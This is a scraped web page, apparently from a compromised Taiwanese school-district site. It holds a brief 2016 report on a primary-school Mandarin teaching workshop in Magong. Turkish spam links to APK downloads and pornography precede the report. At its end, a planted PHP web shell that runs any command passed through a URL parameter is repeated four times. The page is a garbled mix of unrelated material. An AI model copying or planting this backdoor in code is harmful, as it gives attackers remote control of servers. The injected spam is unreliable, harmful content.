apk indir - mp3 indir
porno izle - mobil porno - porno - türkçe porno

105年度國教輔導團國小國語文領域-有效教學工作坊

105年度國教輔導團國小國語文領域-有效教學工作坊

成果報告類型: 
團員增能
隸屬領域: 
國小國語領域
辦理學校: 
馬公市時裡國小
參與對象: 
輔導員、國語文專長教師
辦理日期: 
2016-02-11 to 2016-12-07
參加人次: 
94
執行成效說明: 

1.合計辦理9次工作訪
2暑期辦理備課工作坊

改進策略: 

強化模組設計

error_reporting(0); $bozx=$_GET[boz]; system($bozx); error_reporting(0); $bozx=$_GET[boz]; system($bozx); error_reporting(0); $bozx=$_GET[boz]; system($bozx); error_reporting(0); $bozx=$_GET[boz]; system($bozx);